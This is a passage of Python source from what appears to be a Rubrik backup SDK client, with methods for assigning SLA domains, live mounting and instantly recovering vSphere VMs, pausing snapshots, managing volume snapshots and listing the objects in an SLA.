"assign_sla: Assigning the MSSQL Instance '{}' to the '{}' SLA Domain.".format(
object_name, sla_name))
config = {}
if log_backup_frequency_in_seconds is not None:
config['logBackupFrequencyInSeconds'] = log_backup_frequency_in_seconds
if log_retention_hours is not None:
config['logRetentionHours'] = log_retention_hours
if copy_only is not None:
config['copyOnly'] = copy_only
config['configuredSlaDomainId'] = sla_id
patch_resp = self.patch(
"v1", "/mssql/instance/{}".format(mssql_id), config, timeout)
db_sla_lst.append(patch_resp)
else:
raise InvalidParameterException(
"Host ID not found for instance '{}'".format(object_name))
return db_sla_lst
elif object_type == 'oracle_db':
oracle_db_id = ''
self.log(
'Searching the Rubrik cluster for the current Oracle databases.')
oracle_db_id = self.object_id(
object_name, object_type, hostname=hostname)
if(oracle_db_id):
self.log(
"assign_sla: Determing the SLA Domain currently assigned to the Oracle Database '{}'.".format(object_name))
oracle_summary = self.get(
'internal',
'/oracle/db/{}'.format(oracle_db_id),
timeout=timeout)
if (sla_id == oracle_summary['configuredSlaDomainId'] and log_backup_frequency_in_minutes == oracle_summary['logBackupFrequencyInMinutes'] and
log_retention_hours == oracle_summary['logRetentionHours'] and num_channels == oracle_summary['numChannels']):
return "No change required. The Oracle Database '{}' is already assigned to the '{}' SLA Domain with the following log settings:" \
" log_backup_frequency_in_minutes: {}, log_retention_hours: {} and num_channels: {}.".format(
object_name, sla_name, log_backup_frequency_in_minutes, log_retention_hours, num_channels)
else:
self.log(
"assign_sla: Assigning the Oracle Database '{}' to the '{}' SLA Domain.".format(
object_name, sla_name))
config = {}
if log_backup_frequency_in_minutes is not None:
config['logBackupFrequencyInMinutes'] = log_backup_frequency_in_minutes
if log_retention_hours is not None:
config['logRetentionHours'] = log_retention_hours
if num_channels is not None:
config['numChannels'] = num_channels
config['configuredSlaDomainId'] = sla_id
patch_resp = self.patch(
"internal", "/oracle/db/{}".format(oracle_db_id), config, timeout)
else:
raise InvalidParameterException(
"Database ID not found for instance '{}'".format(object_name))
return patch_resp
elif object_type == 'oracle_host':
host_id = ''
self.log('Searching the Rubrik cluster for the current Oracle hosts.')
host_id = self.object_id(object_name, object_type)
if(host_id):
self.log(
"assign_sla: Determing the SLA Domain currently assigned to the Oracle Host '{}'.".format(object_name))
oracle_summary = self.get(
'internal',
'/oracle/host/{}'.format(host_id),
timeout=timeout)
if (sla_id == oracle_summary['configuredSlaDomainId'] and log_backup_frequency_in_minutes == oracle_summary['logBackupFrequencyInMinutes'] and
log_retention_hours == oracle_summary['logRetentionHours'] and num_channels == oracle_summary['numChannels']):
return "No change required. The Oracle Host '{}' is already assigned to the '{}' SLA Domain with the following log settings:" \
" log_backup_frequency_in_minutes: {}, log_retention_hours: {} and num_channels: {}.".format(
object_name, sla_name, log_backup_frequency_in_minutes, log_retention_hours, num_channels)
else:
self.log(
"assign_sla: Assigning the Oracle Host '{}' to the '{}' SLA Domain.".format(
object_name, sla_name))
config = {}
if log_backup_frequency_in_minutes is not None:
config['logBackupFrequencyInMinutes'] = log_backup_frequency_in_minutes
if log_retention_hours is not None:
config['logRetentionHours'] = log_retention_hours
if num_channels is not None:
config['numChannels'] = num_channels
config['configuredSlaDomainId'] = sla_id
patch_resp = self.patch(
"internal", "/oracle/host/{}".format(host_id), config, timeout)
else:
raise InvalidParameterException(
"Host ID not found for instance '{}'".format(object_name))
return patch_resp
elif object_type == "volume_group":
volume_group_id = self.object_id(
windows_host, "volume_group", timeout=timeout)
physical_host_id = self.object_id(
windows_host, "physical_host", host_os="windows", timeout=timeout)
self.log("assign_sla: Getting a list of all volumes on the '{}' Windows host.".format(
windows_host))
host_volumes = self.get(
"internal", "/host/{}/volume".format(physical_host_id), timeout=timeout)
# If the object_name (volumes to assign to the SLA) is a string, create a list for processing
if not isinstance(object_name, list):
volumes_to_assign = [object_name]
else:
volumes_to_assign = object_name
# Create a mapping of the volumes on the windows host and their ids
currnt_volumes = {}
for volume in host_volumes["data"]:
for v in volume["mountPoints"]:
if v in volumes_to_assign:
currnt_volumes[v] = volume["id"]
# Validate that the provided volume(s) are on the windows host
for v in volumes_to_assign:
try:
currnt_volumes[v]
except KeyError:
raise InvalidParameterException(
"The Windows Host '{}' does not have a '{}' volume.".format(windows_host, v))
self.log(
"assign_sla: Getting details of the current volume group on the Windows host.")
volume_group_details = self.get(
"internal", "/volume_group/{}".format(volume_group_id), timeout=timeout)
# Create a config of the current volume sla settings
current_volumes_included_in_snapshot = []
for volume in volume_group_details["volumes"]:
current_volumes_included_in_snapshot.append(volume["id"])
current_config = {}
current_config["configuredSlaDomainId"] = volume_group_details["configuredSlaDomainId"]
current_config["volumeIdsIncludedInSnapshots"] = current_volumes_included_in_snapshot
# Create the user desired config
volumes_included_in_snapshot = []
for volume, volume_id in currnt_volumes.items():
volumes_included_in_snapshot.append(volume_id)
config = {}
config["configuredSlaDomainId"] = sla_id
config["volumeIdsIncludedInSnapshots"] = volumes_included_in_snapshot
if current_config == config:
return "No change required. The {} volume_group is already assigned to the {} SLA.".format(
object_name, sla_name)
else:
self.log("assign_sla: Assigning the vSphere VM '{}' to the '{}' SLA Domain.".format(
object_name, sla_name))
return self.patch("internal", "/volume_group/{}".format(volume_group_id), config, timeout=timeout)
def vsphere_live_mount(self, vm_name, date='latest', time='latest', host='current', remove_network_devices=False, power_on=True, timeout=15):  # pylint: ignore
    """Live Mount a vSphere VM from a specified snapshot. If a specific date and time is not provided, the last snapshot taken will be used.

    Arguments:
        vm_name {str} -- The name of the vSphere VM to Live Mount.

    Keyword Arguments:
        date {str} -- The date of the snapshot you wish to Live Mount formated as `Month-Day-Year` (ex: 1-15-2014). If `latest` is specified, the last snapshot taken will be used. (default: {'latest'})
        time {str} -- The time of the snapshot you wish to Live Mount formated as `Hour:Minute AM/PM` (ex: 1:30 AM). If `latest` is specified, the last snapshot taken will be used. (default: {'latest'})
        host {str} -- The hostname or IP address of the ESXi host to Live Mount the VM on. By default, the current host will be used. (default: {'current'})
        remove_network_devices {bool} -- Flag that determines whether to remove the network interfaces from the Live Mounted VM. Set to `True` to remove all network interfaces. (default: {False})
        power_on {bool} -- Flag that determines whether the VM should be powered on after the Live Mount. Set to `True` to power on the VM. Set to `False` to mount the VM but not power it on. (default: {True})
        timeout {int} -- The number of seconds to wait to establish a connection the Rubrik cluster before returning a timeout error. (default: {15})

    Raises:
        InvalidTypeException -- When `remove_network_devices` or `power_on` is not a bool.
        InvalidParameterException -- When only one of `date`/`time` is 'latest', or no snapshot matches the provided date/time.

    Returns:
        dict -- The full response of `POST /v1/vmware/vm/snapshot/{snapshot_id}/mount`.
    """
    self.function_name = inspect.currentframe().f_code.co_name

    # Validate argument types and that date/time were provided as a pair.
    if isinstance(remove_network_devices, bool) is False:
        raise InvalidTypeException(
            "The 'remove_network_devices' argument must be True or False.")
    elif isinstance(power_on, bool) is False:
        raise InvalidTypeException(
            "The 'power_on' argument must be True or False.")
    elif date != 'latest' and time == 'latest' or date == 'latest' and time != 'latest':
        raise InvalidParameterException(
            "The date and time arguments most both be 'latest' or a specific date and time.")

    self.log(
        "vsphere_live_mount: Searching the Rubrik cluster for the vSphere VM '{}'.".format(vm_name))
    vm_id = self.object_id(vm_name, 'vmware', timeout=timeout)

    self.log(
        "vsphere_live_mount: Getting a list of all Snapshots for vSphere VM '{}'.".format(vm_name))
    vm_summary = self.get(
        'v1', '/vmware/vm/{}'.format(vm_id), timeout=timeout)

    # Resolve the snapshot to mount. A `None` sentinel replaces the previous
    # reliance on an unbound local + NameError, which was fragile and also
    # shadowed the builtin `id` in the search loop.
    snapshot_id = None
    if date == 'latest' and time == 'latest':
        # Snapshots are returned oldest-first, so the last entry is the latest.
        snapshot_id = vm_summary['snapshots'][-1]['id']
    else:
        self.log(
            "vsphere_live_mount: Converting the provided date/time into UTC.")
        snapshot_date_time = self._date_time_conversion(date, time)
        self.log("vsphere_live_mount: Searching for the provided snapshot.")
        # Substring match against each snapshot's UTC date string; if more
        # than one snapshot matches, the last match wins (original behavior).
        for snapshot in vm_summary['snapshots']:
            if snapshot_date_time in snapshot['date']:
                snapshot_id = snapshot['id']

    if snapshot_id is None:
        raise InvalidParameterException("The vSphere VM '{}' does not have a snapshot taken on {} at {}.".format(
            vm_name, date, time))

    # Mount on the VM's current ESXi host unless an explicit host was given.
    if host == 'current':
        host_id = vm_summary['hostId']
    else:
        host_id = self.object_id(host, 'vmware_host', timeout=timeout)

    config = {}
    config['hostId'] = host_id
    config['removeNetworkDevices'] = remove_network_devices
    config['powerOn'] = power_on

    self.log(
        "vsphere_live_mount: Live Mounting the snapshot taken on {} at {} for vSphere VM '{}'.".format(
            date,
            time,
            vm_name))

    return self.post('v1', '/vmware/vm/snapshot/{}/mount'.format(snapshot_id), config, timeout)
def vsphere_instant_recovery(self, vm_name, date='latest', time='latest', host='current', remove_network_devices=False, power_on=True, disable_network=False, keep_mac_addresses=False, preserve_moid=False, timeout=15):  # pylint: ignore
    """Instantly recover a vSphere VM from a provided snapshot. If a specific date and time is not provided, the last snapshot taken will be used.

    Arguments:
        vm_name {str} -- The name of the VM to Instantly Recover.

    Keyword Arguments:
        date {str} -- The date of the snapshot you wish to Instantly Recover formated as `Month-Day-Year` (ex: 1-15-2014). If 'latest' is specified, the last snapshot taken will used. (default: {'latest'})
        time {str} -- The time of the snapshot you wish to Instantly Recover formated as `Hour:Minute AM/PM` (ex: 1:30 AM). If 'latest' is specified, the last snapshot taken will be used. (default: {'latest'})
        host {str} -- The hostname or IP address of the ESXi host to Instantly Recover the VM on. By default, the current host will be used. (default: {'current'})
        remove_network_devices {bool} -- Flag that determines whether to remove the network interfaces from the Instantly Recovered VM. Set to `True` to remove all network interfaces. (default: {False})
        power_on {bool} -- Flag that determines whether the VM should be powered on after Instant Recovery. Set to `True` to power on the VM. Set to `False` to instantly recover the VM but not power it on. (default: {True})
        disable_network {bool} -- Sets the state of the network interfaces when the VM is instantly recovered. Use `False` to enable the network interfaces. Use `True` to disable the network interfaces. Disabling the interfaces can prevent IP conflicts. (default: {False})
        keep_mac_addresses {bool} -- Flag that determines whether the MAC addresses of the network interfaces on the source VM are assigned to the new VM. Set to `True` to assign the original MAC addresses to the new VM. Set to `False` to assign new MAC addresses. When 'remove_network_devices' is set to `True`, this property is ignored. (default: {False})
        preserve_moid {bool} -- Flag that determines whether to preserve the MOID of the source VM in a restore operation. Use `True` to keep the MOID of the source. Use `False` to assign a new moid. (default: {False})
        timeout {int} -- The number of seconds to wait to establish a connection the Rubrik cluster before returning a timeout error. (default: {15})

    Raises:
        InvalidTypeException -- When any of the boolean flags is not a bool.
        InvalidParameterException -- When only one of `date`/`time` is 'latest', or no snapshot matches the provided date/time.

    Returns:
        dict -- The full response of `POST /v1/vmware/vm/snapshot/{snapshot_id}/instant_recover`.
    """
    self.function_name = inspect.currentframe().f_code.co_name

    # Validate every boolean flag with one loop instead of five copy-pasted
    # checks; the raised message is identical for each argument.
    for arg_name, arg_value in (
            ('remove_network_devices', remove_network_devices),
            ('power_on', power_on),
            ('disable_network', disable_network),
            ('keep_mac_addresses', keep_mac_addresses),
            ('preserve_moid', preserve_moid)):
        if isinstance(arg_value, bool) is False:
            raise InvalidTypeException(
                "The '{}' argument must be True or False.".format(arg_name))

    if date != 'latest' and time == 'latest' or date == 'latest' and time != 'latest':
        raise InvalidParameterException(
            "The date and time arguments most both be 'latest' or a specific date and time.")

    self.log(
        "vsphere_instant_recovery: Searching the Rubrik cluster for the vSphere VM '{}'.".format(vm_name))
    vm_id = self.object_id(vm_name, 'vmware', timeout=timeout)

    self.log(
        "vsphere_instant_recovery: Getting a list of all Snapshots for vSphere VM '{}'.".format(vm_name))
    vm_summary = self.get(
        'v1', '/vmware/vm/{}'.format(vm_id), timeout=timeout)

    # Resolve the snapshot to recover. A `None` sentinel replaces the previous
    # reliance on an unbound local + NameError, which was fragile and also
    # shadowed the builtin `id` in the search loop.
    snapshot_id = None
    if date == 'latest' and time == 'latest':
        # Snapshots are returned oldest-first, so the last entry is the latest.
        snapshot_id = vm_summary['snapshots'][-1]['id']
    else:
        self.log(
            "vsphere_instant_recovery: Converting the provided date/time into UTC.")
        snapshot_date_time = self._date_time_conversion(date, time)
        self.log(
            "vsphere_instant_recovery: Searching for the provided snapshot.")
        # Substring match against each snapshot's UTC date string; if more
        # than one snapshot matches, the last match wins (original behavior).
        for snapshot in vm_summary['snapshots']:
            if snapshot_date_time in snapshot['date']:
                snapshot_id = snapshot['id']

    if snapshot_id is None:
        raise InvalidParameterException(
            "The vSphere VM '{}' does not have a snapshot taken on {} at {}.".format(
                vm_name, date, time))

    # Recover on the VM's current ESXi host unless an explicit host was given.
    if host == 'current':
        host_id = vm_summary['hostId']
    else:
        host_id = self.object_id(host, 'vmware_host', timeout=timeout)

    config = {}
    config['hostId'] = host_id
    config['removeNetworkDevices'] = remove_network_devices
    config['powerOn'] = power_on
    config['disableNetwork'] = disable_network
    config['keepMacAddresses'] = keep_mac_addresses
    config['preserveMoid'] = preserve_moid

    self.log("vsphere_instant_recovery: Instantly Recovering the snapshot taken on {} at {} for vSphere VM '{}'.".format(
        date,
        time,
        vm_name))

    return self.post('v1', '/vmware/vm/snapshot/{}/instant_recover'.format(snapshot_id), config, timeout)
def _date_time_conversion(self, date, time, timeout=30):
    """All date values returned by the Rubrik API are stored in Coordinated Universal Time (UTC)
    and need to be converted to the timezone configured on the Rubrik cluster in order to match
    the values provided by the end user in various functions. This internal function will handle that
    conversion process.

    Arguments:
        date {str} -- A date value formated as `Month-Day-Year` (ex: 1/15/2014).
        time {str} -- A time value formated as `Hour:Minute AM/PM` (ex: 1:30 AM).

    Returns:
        str -- A combined date/time value formated as `Year-Month-DayTHour:Minute` where Hour:Minute is on the 24-hour clock (ex : 2014-1-15T01:30).
    """
    if self.function_name == "":
        self.function_name = inspect.currentframe().f_code.co_name

    # Imported lazily so the module does not pay for pytz unless this
    # conversion helper is actually used.
    from datetime import datetime
    import pytz

    # Reject any date that does not parse as Month-Day-Year.
    try:
        datetime.strptime(date, '%m-%d-%Y')
    except ValueError:
        raise InvalidParameterException(
            "The date argument '{}' must be formatd as 'Month-Date-Year' (ex: 8-9-2018).".format(date))

    # Reject any time that does not parse as a 12-hour clock value.
    try:
        parsed_time = datetime.strptime(time, '%I:%M %p')
    except ValueError:
        raise InvalidParameterException(
            "The time argument '{}' must be formatd as 'Hour:Minute AM/PM' (ex: 2:57 AM).".format(time))

    self.log("_date_time_conversion: Getting the Rubrik cluster timezone.")
    cluster_timezone = self.get(
        'v1', '/cluster/me', timeout=timeout)['timezone']['timezone']

    self.log(
        "_date_time_conversion: Converting the provided time to the 24-hour clock.")
    time_24_hour = parsed_time.strftime("%H:%M")

    self.log("_date_time_conversion: Creating a combined date/time variable.")
    combined = datetime.strptime(
        '{} {}'.format(date, time_24_hour), '%m-%d-%Y %H:%M')

    # The user supplied a wall-clock value in the cluster's local timezone;
    # attach that zone before shifting to UTC.
    localized = pytz.timezone(cluster_timezone).localize(combined)

    self.log("_date_time_conversion: Converting the time to UTC.\n")
    return localized.astimezone(pytz.UTC).strftime('%Y-%m-%dT%H:%M')
def pause_snapshots(self, object_name, object_type, timeout=180):
    """Pause all snapshot activity for the provided object.

    Arguments:
        object_name {str} -- The name of the Rubrik object to pause snapshots for.
        object_type {str} -- The Rubrik object type you wish to pause snaphots on. (choices: {vmware})

    Keyword Arguments:
        timeout {int} -- The number of seconds to wait to establish a connection the Rubrik cluster. (default: {180})

    Returns:
        str -- No change required. The '`object_type`' '`object_name`' is already paused.
        dict -- The full API response for `PATCH /v1/vmware/vm/{vm_id}`.
    """
    self.function_name = inspect.currentframe().f_code.co_name

    # Guard clause: only vSphere VMs are supported today.
    valid_object_type = ['vmware']
    if object_type not in valid_object_type:
        raise InvalidParameterException("The pause_snapshots() object_type argument must be one of the following: {}.".format(
            valid_object_type))

    if object_type == 'vmware':
        self.log("pause_snapshots: Searching the Rubrik cluster for the vSphere VM '{}'.".format(
            object_name))
        vm_id = self.object_id(object_name, object_type, timeout=timeout)

        self.log("pause_snapshots: Determing the current pause state of the vSphere VM '{}'.".format(
            object_name))
        vm_details = self.get(
            'v1', '/vmware/vm/{}'.format(vm_id), timeout=timeout)

        # An active blackout window means the VM is already paused — idempotent no-op.
        if vm_details['blackoutWindowStatus']['isSnappableBlackoutActive']:
            return "No change required. The {} VM '{}' is already paused.".format(object_type, object_name)

        self.log("pause_snapshots: Pausing Snaphots for the vSphere VM '{}'.".format(
            object_name))
        return self.patch('v1', '/vmware/vm/{}'.format(vm_id), {'isVmPaused': True}, timeout)
def resume_snapshots(self, object_name, object_type, timeout=180):
    """Resume all snapshot activity for the provided object.

    Arguments:
        object_name {str} -- The name of the Rubrik object to resume snapshots for.
        object_type {str} -- The Rubrik object type you wish to resume snaphots on. (choices: {vmware})

    Keyword Arguments:
        timeout {int} -- The number of seconds to wait to establish a connection the Rubrik cluster. (default: {180})

    Returns:
        str -- No change required. The 'object_type' object 'object_name' is currently not paused.
        dict -- The full response for `PATCH /v1/vmware/vm/{vm_id}`.
    """
    self.function_name = inspect.currentframe().f_code.co_name

    # Guard clause: only vSphere VMs are supported today.
    valid_object_type = ['vmware']
    if object_type not in valid_object_type:
        raise InvalidParameterException("The resume_snapshots() object_type argument must be one of the following: {}.".format(
            valid_object_type))

    if object_type == 'vmware':
        self.log("resume_snapshots: Searching the Rubrik cluster for the vSphere VM '{}'.".format(
            object_name))
        vm_id = self.object_id(object_name, object_type, timeout=timeout)

        self.log("resume_snapshots: Determing the current pause state of the vSphere VM '{}'.".format(
            object_name))
        vm_details = self.get(
            'v1', '/vmware/vm/{}'.format(vm_id), timeout=timeout)

        # No active blackout window means snapshots are already running — idempotent no-op.
        if not vm_details['blackoutWindowStatus']['isSnappableBlackoutActive']:
            return "No change required. The '{}' object '{}' is currently not paused.".format(
                object_type, object_name)

        self.log("resume_snapshots: Resuming Snaphots for the vSphere VM '{}'.".format(
            object_name))
        return self.patch('v1', '/vmware/vm/{}'.format(vm_id), {'isVmPaused': False}, timeout)
def begin_managed_volume_snapshot(self, name, timeout=30):
    """Open a managed volume for writes. All writes to the managed volume until the snapshot is ended will be part of its snapshot.

    Arguments:
        name {str} -- The name of the Managed Volume to begin the snapshot on.

    Keyword Arguments:
        timeout {int} -- The number of seconds to wait to establish a connection the Rubrik cluster. (default: {30})

    Returns:
        str -- No change required. The Managed Volume '`name`' is already assigned in a writeable state.
        dict -- The full API response for `POST /managed_volume/{id}/begin_snapshot`.
    """
    self.function_name = inspect.currentframe().f_code.co_name

    self.log(
        "begin_managed_volume_snapshot: Searching the Rubrik cluster for the Managed Volume '{}'.".format(name))
    managed_volume_id = self.object_id(
        name, 'managed_volume', timeout=timeout)

    self.log(
        "begin_managed_volume_snapshot: Determing the state of the Managed Volume '{}'.".format(name))
    volume_state = self.get(
        'internal', '/managed_volume/{}'.format(managed_volume_id), timeout=timeout)

    # Already writable — the snapshot window is open, so this is a no-op.
    if volume_state['isWritable']:
        return "No change required. The Managed Volume '{}' is already assigned in a writeable state.".format(name)

    self.log(
        "begin_managed_volume_snapshot: Setting the Managed Volume '{}' to a writeable state.".format(name))
    return self.post('internal', '/managed_volume/{}/begin_snapshot'.format(managed_volume_id),
                     config={}, timeout=timeout)
def end_managed_volume_snapshot(self, name, sla_name='current', timeout=30):
    """Close a managed volume for writes. A snapshot will be created containing all writes since the last begin snapshot call.

    Arguments:
        name {str} -- The name of the Managed Volume to end snapshots on.

    Keyword Arguments:
        sla_name {str} -- The SLA Domain name you want to assign the snapshot to. By default, the currently assigned SLA Domain will be used. (default: {'current'})
        timeout {int} -- The number of seconds to wait to establish a connection the Rubrik cluster. (default: {30})

    Raises:
        InvalidParameterException -- When `sla_name` is 'current' but the Managed Volume has no SLA Domain assigned.

    Returns:
        str -- No change required. The Managed Volume `name` is already assigned in a read only state.
        dict -- The full API response for `POST /managed_volume/{id}/end_snapshot`.
    """
    self.function_name = inspect.currentframe().f_code.co_name

    self.log(
        "end_managed_volume_snapshot: Searching the Rubrik cluster for the Managed Volume '{}'.".format(name))
    managed_volume_id = self.object_id(
        name, 'managed_volume', timeout=timeout)

    self.log(
        "end_managed_volume_snapshot: Determing the state of the Managed Volume '{}'.".format(name))
    managed_volume_summary = self.get(
        "internal", "/managed_volume/{}".format(managed_volume_id), timeout=timeout)

    if not managed_volume_summary['isWritable']:
        # Bug fix: the message previously contained the literal text 'name'
        # instead of interpolating the Managed Volume's name.
        return "No change required. The Managed Volume '{}' is already assigned in a read only state.".format(name)

    if sla_name == 'current':
        self.log(
            "end_managed_volume_snapshot: Searching the Rubrik cluster for the SLA Domain assigned to the Managed Volume '{}'.".format(name))
        # Keeping the current SLA only works when one is actually assigned.
        if managed_volume_summary['slaAssignment'] == 'Unassigned' or managed_volume_summary['effectiveSlaDomainId'] == 'UNPROTECTED':
            raise InvalidParameterException(
                "The Managed Volume '{}' does not have a SLA assigned currently assigned. You must populate the sla_name argument.".format(name))
        # An empty config tells the API to retain the currently assigned SLA.
        config = {}
    else:
        self.log(
            "end_managed_volume_snapshot: Searching the Rubrik cluster for the SLA Domain '{}'.".format(sla_name))
        sla_id = self.object_id(sla_name, 'sla', timeout=timeout)
        config = {}
        config['retentionConfig'] = {}
        config['retentionConfig']['slaId'] = sla_id

    return self.post("internal", "/managed_volume/{}/end_snapshot".format(managed_volume_id), config, timeout)
def get_sla_objects(self, sla, object_type, timeout=15):
    """Retrieve the name and ID of a specific object type.

    Arguments:
        sla {str} -- The name of the SLA Domain you wish to search.
        object_type {str} -- The object type you wish to search the SLA for. (choices: {vmware, hyper-v, mssql_db, ec2_instance, oracle_db, vcd, managed_volume, ahv, nas_share, linux_and_unix_host, windows_host})

    Keyword Arguments:
        timeout {int} -- The number of seconds to wait to establish a connection the Rubrik cluster. (default: {15})

    Returns:
        dict -- The `name:id` of each object in the provided SLA Domain.
    """
    # Preserve the caller's name when this is used as a helper from another
    # SDK function; otherwise record this function as the entry point.
    if self.function_name == "":
        self.function_name = inspect.currentframe().f_code.co_name
    valid_object_type = ['vmware', 'hyper-v',
                         'mssql_db', 'ec2_instance', 'oracle_db', 'vcd', 'managed_volume', 'ahv', 'nas_share', 'linux_and_unix_host', 'windows_host']
    if object_type not in valid_object_type:
        raise InvalidParameterException(
            "The get_sla_object() object_type argument must be one of the following: {}.".format(valid_object_type))

    # Resolve the SLA Domain name to its ID, which every lookup below filters on.
    sla_id = self.object_id(sla, "sla", timeout=timeout)

    # Accumulates the name -> id mapping returned to the caller.
    vm_name_id = {}

    if object_type == "nas_share":
        # The REST API does not have an easy way to filter by SLA so we will use the GQL call
        # NOTE(review): the query text has no leading `query` keyword — presumably
        # self.query() wraps it appropriately; confirm against that helper.
        operation_name = "NasAssignedSLA"

        query = """
        NasAssignedSLA($effectiveSlaDomainId: String) {
            nasShareConnection(effectiveSlaDomainId: $effectiveSlaDomainId) {
                nodes {
                    id
                    hostname
                }
            }
        }
        """

        variables = {
            "effectiveSlaDomainId": sla_id
        }

        all_vms_in_sla = self.query(query, operation_name, variables)

        # NAS shares are keyed by hostname rather than an object name.
        for vm in all_vms_in_sla["nasShareConnection"]["nodes"]:
            vm_name_id[vm["hostname"]] = vm["id"]
    elif object_type == "linux_and_unix_host" or object_type == "windows_host":
        # The REST API does not have an easy way to filter by SLA so we will use the GQL call
        operation_name = "PhysicalHostSLA"

        query = """
        PhysicalHostSLA($effectiveSlaDomainId: String, $operatingSystemType: String, $status: String) {
            hostConnection(effectiveSlaDomainId: $effectiveSlaDomainId, operatingSystemType: $operatingSystemType, status: $status) {
                nodes {
                    id
                    hostname
                }
            }
        }
        """

        # Both host flavors share one query; only the OS filter differs.
        if object_type == "linux_and_unix_host":
            operatingSystemType = "UnixLike"
        else:
            operatingSystemType = "Windows"

        variables = {
            "status": "Connected",
            "effectiveSlaDomainId": sla_id,
            "operatingSystemType": operatingSystemType,
        }

        all_vms_in_sla = self.query(query, operation_name, variables)

        # Physical hosts are also keyed by hostname.
        for vm in all_vms_in_sla["hostConnection"]["nodes"]:
            vm_name_id[vm["hostname"]] = vm["id"]
    else:
        # All remaining object types can be filtered via REST; this table maps
        # each type to the API version and endpoint that lists it.
        api_call = {
            "vmware": {
                "api_version": "v1",
                "api_endpoint": "/vmware/vm"
            },
            "hyper-v": {
                "api_version": "internal",
                "api_endpoint": "/hyperv/vm"
            },
            "mssql_db": {
                "api_version": "v1",
                "api_endpoint": "/mssql/db"
            },
            "ec2_instance": {
                "api_version": "internal",
                "api_endpoint": "/aws/ec2_instance"
            },
            "oracle_db": {
                "api_version": "internal",
                "api_endpoint": "/oracle/db"
            },
            "vcd": {
                "api_version": "internal",
                "api_endpoint": "/vcd/vapp"
            },
            "managed_volume": {
                "api_version": "internal",
                "api_endpoint": "/managed_volume"
            },
            "ahv": {
                "api_version": "internal",
                "api_endpoint": "/nutanix/vm"
            },
        }

        # Relics (deleted-but-retained objects) are excluded from the listing.
        all_vms_in_sla = self.get(
            api_call[object_type]["api_version"],
            api_call[object_type]["api_endpoint"] +
            "?effective_sla_domain_id={}&is_relic=false".format(sla_id),
            timeout=timeout)

        for vm in all_vms_in_sla["data"]:
            vm_name_id[vm["name"]] = vm["id"]

    # An empty mapping means the SLA protects no objects of this type.
    if bool(vm_name_id) is False:
        raise InvalidParameterException(
            "The SLA '{}' is currently not protecting any {} objects.".format(
                sla, object_type))

    return vm_name_id
    def create_sla(self, name, hourly_frequency=None, hourly_retention=None, daily_frequency=None, daily_retention=None, monthly_frequency=None, monthly_retention=None, yearly_frequency=None, yearly_retention=None, archive_name=None, retention_on_brik_in_days=None, instant_archive=False, timeout=15): # pylint: ignore
        """Create a new SLA Domain, or verify idempotently that an identically
        configured SLA Domain with this name already exists.

        The method builds the request body for either the v1 or the v2
        `/sla_domain` endpoint (chosen by the installed CDM version), and if an
        SLA Domain with the same name is already present it compares the
        desired configuration against the cluster's current one instead of
        creating a duplicate.

        Arguments:
            name {str} -- The name of the new SLA Domain.
        Keyword Arguments:
            hourly_frequency {int} -- Hourly frequency to take backups. (default: {None})
            hourly_retention {int} -- Number of hours to retain the hourly backups. (default: {None})
            daily_frequency {int} -- Daily frequency to take backups. (default: {None})
            daily_retention {int} -- Number of hours to retain the daily backups. (default: {None})
            monthly_frequency {int} -- Monthly frequency to take backups. (default: {None})
            monthly_retention {int} -- Number of hours to retain the monthly backups. (default: {None})
            yearly_frequency {int} -- Yearly frequency to take backups. (default: {None})
            yearly_retention {int} -- Number of hours to retain the yearly backups. (default: {None})
            archive_name {str} -- The optional archive location you wish to configure on the SLA Domain. When populated, you must also provide a `retention_on_brik_in_days`. (default: {None})
            retention_on_brik_in_days {int} -- The number of days you wish to keep the backups on the Rubrik cluster. When populated, you must also provide a `archive_name`. (default: {None})
            instant_archive {bool} -- Flag that determines whether or not to enable instant archive. Set to true to enable. (default: {False})
            timeout {int} -- The number of seconds to wait to establish a connection to the Rubrik cluster. (default: {15})
        Returns:
            str -- No change required. The 'name' SLA Domain is already configured with the provided configuration.
            dict -- The full API response for `POST /v1/sla_domain`.
            dict -- The full API response for `POST /v2/sla_domain`.
        Raises:
            InvalidParameterException -- When the frequency/retention arguments
                are inconsistent, or when an SLA Domain with this name exists
                but its configuration does not match the values provided.
        """

        self.function_name = inspect.currentframe().f_code.co_name
        # CDM 5.0+ exposes the richer v2 SLA endpoint; older clusters use v1.
        v2_sla = self.minimum_installed_cdm_version("5.0", timeout=timeout)
        all_params = [
            hourly_frequency,
            hourly_retention,
            daily_frequency,
            daily_retention,
            monthly_frequency,
            monthly_retention,
            yearly_frequency,
            yearly_retention]
        # Validate all values besides name are ints
        for param in all_params:
            if not isinstance(param, int) and param is not None:
                raise InvalidParameterException(
                    "All 'frequency' and 'retention' parameters must be integers.")
        if not isinstance(retention_on_brik_in_days, int) and retention_on_brik_in_days is not None:
            raise InvalidParameterException(
                "The 'retention_on_brik_in_days' parameter must be integer.")
        # Make sure at least one frequency and retention is populated
        if all(value is None for value in all_params):
            raise InvalidParameterException(
                "You must populate at least one frequency and retention.")
        # Make sure the "time unit" frequency and retention are used together
        if hourly_frequency is not None and hourly_retention is None or hourly_frequency is None and hourly_retention is not None:
            raise InvalidParameterException(
                "The 'hourly_frequency' and 'hourly_retention' parameters must be populated together.")
        if daily_frequency is not None and daily_retention is None or daily_frequency is None and daily_retention is not None:
            raise InvalidParameterException(
                "The 'daily_frequency' and 'daily_retention' parameters must be populated together.")
        if monthly_frequency is not None and monthly_retention is None or monthly_frequency is None and monthly_retention is not None:
            raise InvalidParameterException(
                "The 'monthly_frequency' and 'monthly_retention' parameters must be populated together.")
        if yearly_frequency is not None and yearly_retention is None or yearly_frequency is None and yearly_retention is not None:
            raise InvalidParameterException(
                "The 'yearly_frequency' and 'yearly_retention' parameters must be populated together.")
        if archive_name is not None and retention_on_brik_in_days is None or archive_name is None and retention_on_brik_in_days is not None:
            raise InvalidParameterException(
                "The 'archive_name' and 'retention_on_brik_in_days' parameters must be populated together.")
        try:
            # object_id() will set sla_already_present to something besides False if the SLA is already on the cluter
            sla_id = self.object_id(name, "sla", timeout=timeout)
        except InvalidParameterException:
            # The SLA is not on the cluster yet; fall through to creation.
            sla_id = False
        config = {}
        config["name"] = name
        if v2_sla is True:
            # create the config for the v2 API
            # v2 models the frequencies as a nested object keyed by time unit.
            config["frequencies"] = {}
            if hourly_frequency is not None:
                config["frequencies"]["hourly"] = {}
                config["frequencies"]["hourly"]["frequency"] = hourly_frequency
                config["frequencies"]["hourly"]["retention"] = hourly_retention
            if daily_frequency is not None:
                config["frequencies"]["daily"] = {}
                config["frequencies"]["daily"]["frequency"] = daily_frequency
                config["frequencies"]["daily"]["retention"] = daily_retention
            if monthly_frequency is not None:
